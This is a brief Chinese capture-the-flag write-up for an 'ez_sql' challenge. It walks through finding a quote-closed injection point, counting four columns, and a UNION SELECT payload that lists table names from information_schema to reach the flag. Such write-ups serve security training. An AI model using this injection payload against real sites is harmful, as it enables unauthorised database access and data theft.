ez_sql WP

ez_sql WP

首先输入一个数字，我们输入 \(1\) 后，呈现为这样。

随后判断为字符型，闭合方式为 '，这里有个地方要注意，就是要用 # 来注释。 1' #

然后判断列数：

判断得到列数为 4。

后面继续像前面 sqli-lab 的操作。

0' union select 1, 2, 3 , group_concat(table_name) from information_schema.tables where table_schema=database() #

最终得到 flag。